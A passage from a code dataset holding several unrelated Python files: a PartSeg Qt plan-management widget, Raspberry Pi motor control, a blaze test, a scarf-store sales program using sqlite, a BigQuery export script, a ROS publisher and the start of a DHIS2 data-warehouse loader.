info_chose_layout.addWidget(self.calculate_plans)\n info_chose_layout.addWidget(QLabel(\"Preview:\"))\n info_chose_layout.addWidget(self.plan_view)\n info_layout.addLayout(info_chose_layout)\n self.setLayout(info_layout)\n self.calculate_plans.addItems(sorted(self.settings.batch_plans.keys()))\n self.protect = False\n self.plan_to_edit = None\n\n self.plan_view.header().close()\n self.calculate_plans.currentTextChanged.connect(self.plan_preview)\n self.delete_plan_btn.clicked.connect(self.delete_plan)\n self.edit_plan_btn.clicked.connect(self.edit_plan)\n self.export_plans_btn.clicked.connect(self.export_plans)\n self.import_plans_btn.clicked.connect(self.import_plans)\n self.settings.batch_plans_changed.connect(self.update_plan_list)\n self.plan_view.customContextMenuRequested.connect(self._context_menu)\n\n def _context_menu(self, point):\n item = self.plan_view.itemAt(point)\n data = item.data(0, Qt.UserRole)\n if data is None:\n return\n\n menu = QMenu(self)\n if isinstance(data, ROIExtractionProfile):\n action = QAction(\"Save ROI extraction Profile\")\n action.triggered.connect(lambda _: self._save_roi_profile(data))\n elif isinstance(data, MeasurementCalculate):\n action = QAction(\"Save Measurement profile\")\n action.triggered.connect(lambda _: self._save_measurement_profile(data.measurement_profile))\n else:\n raise ValueError(f\"Not supported data type {type(data)} for {data}\")\n menu.addAction(action)\n menu.exec_(self.plan_view.mapToGlobal(point))\n\n def _save_roi_profile(self, data: ROIExtractionProfile):\n if data.name in self.settings.roi_profiles:\n text, ok = QInputDialog.getText(\n self, \"Name collision\", \"Profile with this name exists, please provide a new name.\", text=data.name\n )\n if not ok:\n return None\n return self._save_roi_profile(typing.cast(ROIExtractionProfile, data.copy(update={\"name\": text})))\n self.settings.roi_profiles[data.name] = data\n return None\n\n def _save_measurement_profile(self, data: MeasurementProfile):\n if data.name in self.settings.measurement_profiles:\n text, ok = QInputDialog.getText(\n self, \"Name collision\", \"Profile with this name exists, please provide a new name.\", text=data.name\n )\n if not ok:\n return None\n return self._save_measurement_profile(typing.cast(MeasurementProfile, data.copy(update={\"name\": text})))\n self.settings.measurement_profiles[data.name] = data\n return None\n\n def update_plan_list(self):\n new_plan_list = sorted(self.settings.batch_plans.keys())\n if self.calculate_plans.currentItem() is not None:\n text = str(self.calculate_plans.currentItem().text())\n try:\n index = new_plan_list.index(text)\n except ValueError:\n index = -1\n else:\n index = -1\n self.protect = True\n self.calculate_plans.clear()\n self.calculate_plans.addItems(new_plan_list)\n if index != -1:\n self.calculate_plans.setCurrentRow(index)\n self.protect = False\n\n def export_plans(self):\n choose = ExportDialog(self.settings.batch_plans, PlanPreview)\n if not choose.exec_():\n return\n dial = PSaveDialog(\n \"Calculation plans (*.json)\",\n caption=\"Export calculation plans\",\n settings=self.settings,\n path=\"io.batch_plan_directory\",\n )\n dial.selectFile(\"calculation_plans.json\")\n if dial.exec_():\n file_path = str(dial.selectedFiles()[0])\n data = {x: self.settings.batch_plans[x] for x in choose.get_export_list()}\n with open(file_path, \"w\", encoding=\"utf-8\") as ff:\n json.dump(data, ff, cls=self.settings.json_encoder_class, indent=2)\n\n def import_plans(self):\n dial = PLoadDialog(\n [LoadPlanJson, LoadPlanExcel],\n settings=self.settings,\n path=\"io.batch_plan_directory\",\n caption=\"Import calculation plans\",\n )\n if dial.exec_():\n res = dial.get_result()\n plans, err = res.load_class.load(res.load_location)\n if err:\n show_warning(\"Import error\", f\"error during importing, part of data were filtered. {err}\")\n choose = ImportDialog(plans, self.settings.batch_plans, PlanPreview, CalculationPlan)\n if choose.exec_():\n for original_name, final_name in choose.get_import_list():\n self.settings.batch_plans[final_name] = plans[original_name]\n\n def delete_plan(self):\n if self.calculate_plans.currentItem() is None:\n return\n text = str(self.calculate_plans.currentItem().text())\n if not text:\n return # pragma: no cover\n if text in self.settings.batch_plans:\n del self.settings.batch_plans[text]\n self.plan_view.clear()\n\n def edit_plan(self):\n if self.calculate_plans.currentItem() is None:\n return\n text = str(self.calculate_plans.currentItem().text())\n if not text:\n return # pragma: no cover\n if text in self.settings.batch_plans:\n self.plan_to_edit = self.settings.batch_plans[text]\n self.plan_to_edit_signal.emit()\n\n def plan_preview(self, text):\n if self.protect:\n return\n text = str(text)\n if not text.strip():\n return\n plan = self.settings.batch_plans[text]\n self.plan_view.set_plan(plan)\n\n\nclass CalculatePlaner(QSplitter):\n \"\"\"\n :type settings: Settings\n \"\"\"\n\n def __init__(self, settings, parent=None):\n super().__init__(parent)\n self.settings = settings\n self.info_widget = CalculateInfo(settings)\n self.addWidget(self.info_widget)\n self.create_plan = CreatePlan(settings)\n self.info_widget.plan_to_edit_signal.connect(self.create_plan.edit_plan)\n self.addWidget(self.create_plan)\n","sub_path":"package/PartSeg/_roi_analysis/prepare_plan_widget.py","file_name":"prepare_plan_widget.py","file_ext":"py","file_size_in_byte":48766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380878076","text":"import config\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\nGPIO.setmode(GPIO.BOARD)\n\nMotorE_A = config.Config.getValue(\"motorE_A\") #6\nMotorE_B = config.Config.getValue(\"motorE_B\") #13\nMotorE_E = config.Config.getValue(\"motorE_E\") #5\n\nMotorW_A = config.Config.getValue(\"motorW_A\") #20\nMotorW_B = config.Config.getValue(\"motorW_B\") #21\nMotorW_E = config.Config.getValue(\"motorW_E\") #16\n\nGPIO.setup(MotorE_A,GPIO.OUT)\nGPIO.setup(MotorE_B,GPIO.OUT)\nGPIO.setup(MotorE_E,GPIO.OUT)\n\nGPIO.setup(MotorW_A,GPIO.OUT)\nGPIO.setup(MotorW_B,GPIO.OUT)\nGPIO.setup(MotorW_E,GPIO.OUT)\n\n\ndef go_in_open_motor_e():\n GPIO.output(MotorE_A,GPIO.HIGH)\n GPIO.output(MotorE_B,GPIO.LOW)\n GPIO.output(MotorE_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_open_motor_w():\n GPIO.output(MotorW_A,GPIO.HIGH)\n GPIO.output(MotorW_B,GPIO.LOW)\n GPIO.output(MotorW_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_closed_motor_e():\n GPIO.output(MotorE_A,GPIO.LOW)\n GPIO.output(MotorE_B,GPIO.HIGH)\n GPIO.output(MotorE_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_closed_motor_w():\n GPIO.output(MotorW_A,GPIO.LOW)\n GPIO.output(MotorW_B,GPIO.HIGH)\n GPIO.output(MotorW_E,GPIO.HIGH)\n sleep(2)\n\ndef stop_motor_e():\n GPIO.output(MotorE_E,GPIO.LOW)\n\ndef stop_motor_w():\n GPIO.output(MotorW_E,GPIO.LOW)\n\nGPIO.cleanup()\n","sub_path":"motor_control.py","file_name":"motor_control.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279254487","text":"import datashape\nimport pytest\nfrom datashape import dshape\n\nfrom blaze import symbol\n\n\n@pytest.mark.parametrize(\n 'ds',\n [\n 'var * {name: string}',\n 'var * {name: ?string}',\n 'var * string',\n 'var * ?string',\n 'string',\n ]\n)\ndef test_like(ds):\n t = symbol('t', ds)\n expr = getattr(t, 'name', t).like('Alice*')\n assert expr.pattern == 'Alice*'\n assert expr.schema.measure == dshape(\n '%sbool' % ('?' if '?' in ds else '')\n ).measure\n","sub_path":"lib/python2.7/site-packages/blaze/expr/tests/test_strings.py","file_name":"test_strings.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"7478005","text":"import sqlite3\r\nimport datetime\r\n\r\nnow = datetime.datetime.now()\r\n\r\nconn = sqlite3.connect('test.db')\r\n\r\ndef mainUI():\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--w w w eeeeee ll ccccccc ooooo m m eeeeee--\")\r\n print(\"-- w w w w ee ll ccccc oo oo m m m m ee --\")\r\n print(\"-- w w w w eeeeee ll ccc oo oo m m m m eeeeee--\")\r\n print(\"-- w w w w ee ll ccccc oo oo m m m m ee --\")\r\n print(\"-- w w eeeeee lllllll ccccccc ooooo m m m eeeeee--\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- sssss ccccccc aaa rrrrr fffffff --\")\r\n print(\"-- ss ccccc aa aa rr rr ff --\")\r\n print(\"-- ssssss ccc aa aa rrrrrr fffff --\")\r\n print(\"-- ss ccccc aaaaaaaaa rr rr ff --\")\r\n print(\"-- sssss ccccccc aa aa rr rr ff --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- sssss tttttt ooooo rrrrr eeeeee --\")\r\n print(\"-- ss tt oo oo rr rr ee --\")\r\n print(\"-- ssssss tt oo oo rrrrrr eeeeee --\")\r\n print(\"-- ss tt oo oo rr rr ee --\")\r\n print(\"-- sssss tt ooooo rr rr eeeeee --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- Connected and Ready To Go --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n\r\ndef closingUI():\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- gggggg ooooo ooooo ddddd bbbb yy yy eeeeee --\")\r\n print(\"-- gg oo oo oo oo d d b b yy yy ee --\")\r\n print(\"-- gg ggg oo oo oo oo d d bbbbb yyyy eeeeee --\")\r\n print(\"-- gg gg oo oo oo oo d d b b yy ee --\")\r\n print(\"-- ggggggg ooooo ooooo ddddd bbbbbb yy eeeeee --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- Disconnected, Bye Bye :D --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n\r\nn=0\r\n\r\ndef logIn(n):\r\n while (n!=1):\r\n holds = conn.execute(\"SELECT username, password,status from LOGIN\")\r\n print(\"\\nPlease login before continue\\n\")\r\n username = input(\"enter username : \")\r\n password = input(\"enter password : \")\r\n for row in holds:\r\n if (username == row[0] and password == row[1]):\r\n print(\"login successful\")\r\n name2=row[0]\r\n status=row[2]\r\n if(status.lower() == \"staff\"):\r\n anss=\"yes\"\r\n while(anss.lower() == \"yes\" or anss.lower() == \"y\"):\r\n selection3=int(input(\"1-Transaction 2-Add Member 3-Change Password : \"))\r\n if(selection3 == 1):\r\n ans=\"yes\"\r\n while(ans.lower() == \"yes\" or ans.lower() == \"y\"):\r\n calculatePrice(name2, status)\r\n ans=input(\"New Customer ? yes or no ? : \")\r\n elif(selection3 == 2):\r\n addMember()\r\n elif(selection3 == 3):\r\n updatePassword()\r\n anss = input(\"Next Customer ? yes or no ? : \")\r\n if(status.lower() == \"admin\"):\r\n ansss = \"yes\"\r\n while (ansss.lower() == \"yes\" or ansss.lower() == \"y\"):\r\n selection=int(input(\"Choose task 1-Approve Member 2-Add New Staff 3-View Staff 4-Remove Staff 5-Remove Member : \"))\r\n if (selection == 1):\r\n viewMember()\r\n selection2=input(\"Continue ? yes or no ?\")\r\n if(selection2.lower()==\"yes\" or selection2.lower()==\"y\"):\r\n rota=\"yes\"\r\n while(rota.lower() == \"yes\" or rota.lower() == \"y\"):\r\n appMember()\r\n rota=input(\"approve next member ? yes or no ?\")\r\n elif(selection == 2):\r\n addStaff()\r\n elif(selection == 3):\r\n viewStaff()\r\n elif (selection == 4):\r\n removeStaff()\r\n elif (selection == 5):\r\n removeMember()\r\n ansss=input(\"Other Task ? Yes or no ? :\")\r\n n=1\r\n break\r\n elif (username != row[0] and password == row[1]):\r\n pass\r\n elif (username == row[0] and password != row[1]):\r\n pass\r\n if (n == 0):\r\n print(\"No user data found, check your username and password\")\r\n\r\ndef calculatePrice(name2,status):\r\n holdw = conn.execute(\"SELECT id,status from MEMBER\")\r\n data = []\r\n dataon = []\r\n newprice = 0\r\n discounted = 0\r\n priceB = 0\r\n priceN = 0\r\n priceF = 0\r\n priceD = 0\r\n priceaddon = 0\r\n quantityaddon = 0\r\n nodata = \"\"\r\n answer = \"yes\"\r\n addon = \"yes\"\r\n add = \"yes\"\r\n print(\"WELCOME\",status.upper(),name2.upper())\r\n print(\"#---------------------------------------------------#\")\r\n print(\"| |\")\r\n print(\"| CATALAOG SCARF STORE |\")\r\n print(\"| |\")\r\n print(\"#---------------------------------------------------#\")\r\n print(\"| CODENAME | NAME | PRICE(RM) |\")\r\n print(\"| aidijuma | AIDIJUMA HIJAB | 40.00 |\")\r\n print(\"| lofahijab | NEELOFA HIJAB | 80.00 |\")\r\n print(\"| fareeda | FAREEDA HIJAB | 100.00 |\")\r\n print(\"| duck | dUck SCARF | 130.00 |\")\r\n print(\"|___________|___________________________|___________|\")\r\n name = input(\"Enter Name : \")\r\n data.append(name)\r\n ic = input(\"Enter the IC number: \")\r\n id = int(input(\"Enter ID : \"))\r\n data.append(ic)\r\n count = 1\r\n countadd = 1\r\n while (answer.lower() == \"yes\" or answer.lower() == \"y\"):\r\n brand = input(\"Enter type of tudung : \")\r\n data.append(brand)\r\n if brand.lower() == \"aidijuma\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Aidijuma Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 40\r\n priceB += price\r\n\r\n elif brand.lower() == \"lofahijab\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Neelofa Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 80\r\n priceN = price + priceN\r\n elif brand.lower() == \"fareeda\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of Fareeda Hijab : \"))\r\n data.append(quantity)\r\n price = quantity * 100\r\n priceF = price + priceF\r\n elif brand.lower() == \"duck\":\r\n print(\"Colours Avaiable\")\r\n print(\"- choco lava\")\r\n print(\"- grey sky morning\")\r\n print(\"- coldplay\")\r\n print(\"- butterfingers\")\r\n colours = input(\"Enter colours : \")\r\n data.append(colours)\r\n quantity = int(input(\"Enter the quantity of dUck Scarf : \"))\r\n data.append(quantity)\r\n price = quantity * 130\r\n priceD = price + priceD\r\n answer = input(\"Do you still want to shopping with us ? : \")\r\n if (answer.lower() == \"yes\" or answer.lower() == \"y\"):\r\n count += 1\r\n else:\r\n newprice += priceB + priceN + priceD + priceF\r\n addon = input(\"Do you want to add on? :\")\r\n if (addon.lower() == \"yes\" or addon.lower() == \"y\"):\r\n print(\"masuk\")\r\n add = \"yes\"\r\n while (add.lower() == \"yes\" or add.lower() == \"y\"):\r\n print(\"*---------------------------*\")\r\n print(\"| ADD-ON LIST |\")\r\n print(\"*---------------------------*\")\r\n print(\"| -> Inner Scarf |\")\r\n print(\"| -> Brooch |\")\r\n print(\"| -> Handsock |\")\r\n print(\"| -> Crystal |\")\r\n print(\"|___________________________|\")\r\n tambahan = input(\"Enter add-on : \")\r\n dataon.append(tambahan)\r\n quantityaddon = int(input(\"Enter quantity of your addon : \"))\r\n dataon.append(quantityaddon)\r\n priceaddon = (quantityaddon * 5) + priceaddon\r\n dataon.append(priceaddon)\r\n add = input(\"Do you want to buy add-on again\")\r\n if (add == \"yes\"):\r\n countadd += 1\r\n newprice = newprice + priceaddon\r\n for rotate in holdw:\r\n if(id == rotate[0]):\r\n discounted = newprice - (newprice * 0.1)\r\n else:\r\n discounted = newprice\r\n data.append(newprice)\r\n data.append(discounted)\r\n print(\"*------------------------------------*\\n\")\r\n print(\"| |\\n\")\r\n print(\"| WELCOME TO SCARF STORE |\\n\")\r\n print(\"| |\\n\")\r\n print(\"*------------------------------------*\\n\")\r\n print(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n print(\"STAFF : %s\\n\" % name2)\r\n print(\"NAME : %s\\n\" % data[0])\r\n print(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n print(\"BRAND : %s \\n\" % data[n])\r\n print(\"COLOURS : %s \\n\" % data[n + 1])\r\n print(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n i = 0\r\n for hehe in range(0, countadd):\r\n print(\"ACCESSORIES(RM5) : %s \\n\" % dataon[i])\r\n print(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[i + 1])\r\n i += 2\r\n print(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[i])\r\n print(\"TOTAL PRICE : %s \\n\" % data[n])\r\n print(\"AFTER DISCOUNT : %s \\n\" % data[n+1])\r\n\r\n file = open(ic + '.txt', 'a')\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"| WELCOME TO SCARF STORE |\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n file.write(\"STAFF : %s\\n\" % name2)\r\n file.write(\"NAME : %s\\n\" % data[0])\r\n file.write(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n file.write(\"BRAND : %s \\n\" % data[n])\r\n file.write(\"COLOURS : %s \\n\" % data[n + 1])\r\n file.write(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n i = 0\r\n for hehe in range(0, countadd):\r\n file.write(\"ACCESSORIES(RM5) : %s \\n\" % dataon[i])\r\n file.write(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[i + 1])\r\n i += 2\r\n file.write(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[i])\r\n file.write(\"TOTAL PRICE : %s \\n\" % data[n])\r\n file.write(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n file.close()\r\n else:\r\n dataon.append(nodata)\r\n data.append(newprice)\r\n for rotate in holdw:\r\n if(id == rotate[0]):\r\n discounted = newprice - (newprice * 0.1)\r\n else:\r\n discounted = newprice\r\n data.append(discounted)\r\n print(\"*------------------------------------*\\n\")\r\n print(\"| |\\n\")\r\n print(\"| WELCOME TO SCARF STORE |\\n\")\r\n print(\"| |\\n\")\r\n print(\"*------------------------------------*\\n\")\r\n print(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n print(\"STAFF : %s\\n\" % name2)\r\n print(\"NAME : %s\\n\" % data[0])\r\n print(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n print(\"BRAND : %s \\n\" % data[n])\r\n print(\"COLOURS : %s \\n\" % data[n + 1])\r\n print(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n print(\"ACCESSORIES(RM5) : %s \\n\" % dataon[0])\r\n print(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[0])\r\n print(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[0])\r\n print(\"TOTAL PRICE : %s \\n\" % data[n])\r\n print(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n\r\n file = open(ic + '.txt', 'a')\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"| WELCOME TO SCARF STORE |\\n\")\r\n file.write(\"| |\\n\")\r\n file.write(\"*------------------------------------*\\n\")\r\n file.write(now.strftime(\"%Y-%m-%d %H:%M %p\\n\"))\r\n file.write(\"STAFF : %s\\n\" % name2)\r\n file.write(\"NAME : %s\\n\" % data[0])\r\n file.write(\"IC NUMBER : %s \\n\" % data[1])\r\n n = 2\r\n for row in range(0, count):\r\n file.write(\"BRAND : %s \\n\" % data[n])\r\n file.write(\"COLOURS : %s \\n\" % data[n + 1])\r\n file.write(\"QUANTITY : %s \\n\" % data[n + 2])\r\n n += 3\r\n file.write(\"ACCESSORIES(RM5) : %s \\n\" % dataon[0])\r\n file.write(\"QUANTITY OF ACCESSORIES :%s \\n\" % dataon[0])\r\n file.write(\"TOTAL PRICE OF ACCESSORIES : %s \\n\" % dataon[0])\r\n file.write(\"TOTAL PRICE : %s \\n\" % data[n])\r\n file.write(\"AFTER DISCOUNT : %s \\n\" % data[n + 1])\r\n file.close()\r\n\r\n\r\ndef viewMember():\r\n\r\n cursor = conn.execute(\"SELECT id, name, age, address, status from MEMBER\")\r\n for row in cursor:\r\n print(\"ID = \", row[0])\r\n print(\"NAME = \", row[1])\r\n print(\"AGE = \", row[2])\r\n print(\"ADDRESS = \", row[3])\r\n print(\"STATUS = \", row[4], \"\\n\")\r\n\r\ndef viewStaff():\r\n\r\n cursor2 = conn.execute(\"SELECT username, status from LOGIN\")\r\n for row2 in cursor2:\r\n print(\"ID = \", row2[0])\r\n print(\"STATUS = \", row2[1], \"\\n\")\r\n\r\ndef appMember():\r\n\r\n approve = conn.execute(\"SELECT id, status from MEMBER\")\r\n id=int(input(\"Enter ID\"))\r\n statuss=\"Approve\"\r\n conn.execute('''UPDATE MEMBER SET STATUS = ? WHERE id = ? ''',(statuss, id))\r\n conn.commit()\r\n\r\ndef updatePassword():\r\n usern=input(\"Enter Staff Name : \")\r\n passww=input(\"Enter New Password : \")\r\n conn.execute('''UPDATE LOGIN SET PASSWORD = ? WHERE USERNAME = ? ''',(passww,usern))\r\n conn.commit()\r\n\r\ndef addMember():\r\n\r\n memID=int(input(\"Enter ID : \"))\r\n memName=input(\"Enter Name : \")\r\n memAge=int(input(\"Enter Age : \"))\r\n memAddress=input(\"Enter Address : \")\r\n memStatus=\"Pending\"\r\n conn.execute(\"INSERT INTO MEMBER (ID,NAME,AGE,ADDRESS,STATUS) VALUES (?, ?, ?, ?, ?)\",(memID,memName,memAge,memAddress,memStatus))\r\n conn.commit()\r\n\r\ndef addStaff():\r\n staName = input(\"Enter Name : \")\r\n staPassword = input(\"Enter Password : \")\r\n staStatus = \"staff\"\r\n conn.execute(\"INSERT INTO LOGIN (username,password,status) VALUES (?, ?, ?)\",\r\n (staName,staPassword, staStatus))\r\n conn.commit()\r\n\r\ndef removeMember():\r\n\r\n id3=int(input(\"Enter Member Id : \"))\r\n conn.execute('DELETE FROM MEMBER WHERE id=?', (id3,))\r\n conn.commit()\r\n\r\ndef removeStaff():\r\n\r\n name3 = input(\"Enter Staff Name : \")\r\n conn.execute('DELETE FROM LOGIN WHERE username=?', (name3,))\r\n conn.commit()\r\n\r\nmainUI()\r\nlogIn(n)\r\nconn.close()\r\nclosingUI()","sub_path":"SCARF STORE.py","file_name":"SCARF STORE.py","file_ext":"py","file_size_in_byte":18066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414644044","text":"from google.cloud import bigquery, storage\nimport traceback\nimport logging\n\n\ndef create_table(project, dataset_id, table_id):\n\n schema = [\n bigquery.SchemaField(\"event_name\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"user_id\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"user_pseudo_id\", \"STRING\", mode=\"NULLABLE\"),\n bigquery.SchemaField(\"event_date\", \"DATE\", mode=\"NULLABLE\")\n ]\n\n client = bigquery.Client()\n\n tbl = project + '.' + dataset_id + '.' + table_id\n\n table = bigquery.Table(tbl, schema=schema)\n table = client.create_table(table)\n print(\n \"Created table {}.{}.{}\".format(table.project, table.dataset_id, table.table_id)\n )\n\ndef populate_table():\n\n client = bigquery.Client()\n\n query_job = client.query(\"\"\"\nINSERT INTO `?.?.app_events`\n(event_name, user_id, user_pseudo_id, event_date)\nSELECT event_name, user_id, user_pseudo_id, PARSE_DATE('%Y%m%d', event_date) as event_date\nFROM\n `ez-mobileapp-prodtest.analytics_200206438.events_*`\nGROUP BY\n event_name,user_id,user_pseudo_id,event_date;\n \"\"\")\n\n results = query_job.result()\n\n for row in results:\n print(\"{} : {} views\".format(row.url, row.view_count))\n\n\ndef download_table():\n\n client = bigquery.Client()\n\n destination_uri = \"gs://{}/{}\".format(bucket_name, \"app_events.csv\")\n dataset_ref = client.dataset(dataset_id, project=project)\n table_ref = dataset_ref.table(table_id)\n\n extract_job = client.extract_table(\n table_ref,\n destination_uri,\n location='US')\n extract_job.result()\n\n print(\n \"Exported {}:{}.{} to {}\".format(\n project, dataset_id, table_id, destination_uri)\n )\n\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name): # test passed\n\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n\n blob.download_to_filename(destination_file_name)\n\n print('Blob {} downloaded to {}.'.format(\n source_blob_name,\n destination_file_name))\n\ndef clean_table():\n\n client = bigquery.Client()\n\n tbl = project + '.' + dataset_id + '.' + table_id\n\n client.delete_table(tbl, not_found_ok=False)\n print(\"Deleted table '{}'.\".format(tbl))\n\n\nif __name__ == '__main__':\n\n project = \"?-?-?\"\n dataset_id = \"?\"\n table_id = \"app_events\"\n bucket_name = \"?\"\n source_blob_name = \"app_events.csv\"\n destination_file_name = \"/?/?/app_events_downloaded.csv\"\n\nexitCode = 0\ntry :\n create_table(project, dataset_id, table_id)\n populate_table()\n download_table()\n download_blob(bucket_name, source_blob_name, destination_file_name)\n clean_table()\n\nexcept Exception as e :\n\tprint('Exception')\n\tlogging.error(traceback.format_exc())\n\texitCode = 1\nelse :\n\tprint('Success!')\n\texitCode = 0\nfinally :\n\tprint(': Done.')\n\nexit(exitCode)\n","sub_path":"firebase.py","file_name":"firebase.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629030486","text":"#!/usr/bin/env python\n\nimport rospy\nfrom spring_seminar.msg import Pos\nfrom spring_seminar.msg import State\n\ndef pos_publisher():\n pub = rospy.Publisher('position', Pos, queue_size=10)\n rospy.init_node('test_pub', anonymous=True)\n r = rospy.Rate(1)\n x_pos = 1.0\n y_pos = 1.0\n z_pos = 1.0\n msg = Pos()\n while not rospy.is_shutdown():\n msg.x_pos = x_pos\n msg.y_pos = y_pos\n msg.z_pos = z_pos\n\n rospy.loginfo(\"Position:%s,%s,%s\" ,x_pos, y_pos, z_pos)\n pub.publish(msg)\n r.sleep()\n\ndef state_publisher():\n pub = rospy.Publisher('state', State, queue_size=10)\n rospy.init_node('test_pub', anonymous=True)\n r = rospy.Rate(1)\n state = 0\n msg = State()\n while not rospy.is_shutdown():\n msg.State = state\n\n rospy.loginfo(\"State:\" + state)\n pub.publish(msg)\n r.sleep()\n\nif __name__ == '__main__':\n try:\n pos_publisher()\n except rospy.ROSInternalException: pass\n # try:\n # state_publisher()\n # except rospy.ROSInterruptException: pass\n","sub_path":"scripts/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414732100","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPartners in Health DHIS Data Warehousing Project\n\nObjective: Develop a tool that extracts data from DHIS2 Web API and loads into central data warehouse\nCountry: Liberia\n\nSteps:\n 1) Create Liberia MySQL Database\n 2) Run this script - set variable to allow total upload\n 3) Run this script - set variable to allow weekly upload\n 4) Set up Cron Scheduler to run on weekly basis\n\"\"\"\n\n# Import all relevant packages\nimport requests\nimport json\nfrom pprint import pprint\nimport pandas as pd\nimport itertools\nimport re\nimport mysql.connector\nfrom pandas.io import sql\nfrom sqlalchemy import create_engine\nimport pymysql\nimport datetime\n\n\n###########################################################################\n# Set Permanent Global variables\n###########################################################################\n\n####set variable to allow total upload\n## To re-run the initial install and import all metadata from the start,\n## un-comment the initialize line.\n__name__ = \"initialize\"\n\n# Source DHIS2 credentials and base URL\nauthorization = ('TODO-DHIS-USERNAME', 'TODO-DHIS-PASSWORD')\nbase_url = \"https://TODO-SERVER-URL/dhis/api\"\n\n# Target database credentials and database name\nsql_user = \"TODO-SQL-USERNAME\"\nsql_pw = \"TODO-SQL-PASSWORD\"\nsql_db = \"liberia_dhis_warehouse\"\n\n# Set Time period\nif __name__ == \"__main__\":\n period = \"pe:LAST_12_MONTHS\"\n\nelse:\n years = [\"2000\", \"2001\", \"2002\", \"2003\", \"2004\", \"2005\", \"2006\", \"2007\", \"2008\",\n \"2009\", \"2010\", \"2011\", \"2012\", \"2013\", \"2014\", \"2015\", \"2016\", \"2017\", \"2018\"]\n months = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n all_months = ';'.join([year + month for year, month in itertools.product(years, months)])\n period = \"pe:\" + all_months\n\n\n############################################################################\n# Pull informational data\n# E.g., Indicator Groups, Indicators, Organisation Units\n############################################################################\n\n\n################\n# Pull Org Units\n################\n# Create organization units dictionary\n\n#Base OU url\norgUnitsUrl = base_url + \"/organisationUnits?paging=False\"\n\n#Function that pulls each of the org units by level\ndef pull_orgs(orgUnitsUrl, level):\n #request and load into json\n orgs = requests.get(orgUnitsUrl + \"&\" + level, auth = authorization)\n orgs = json.loads(orgs.text)\n\n #iterate and append id and and displayname\n orgUnitsUrl_list = []\n for o in orgs['organisationUnits']:\n for key, value in o.items():\n orgUnitsUrl_list.append(value)\n\n #Convert to dictionary to easily pull in and out. Can just use keys for params\n orgUnits = 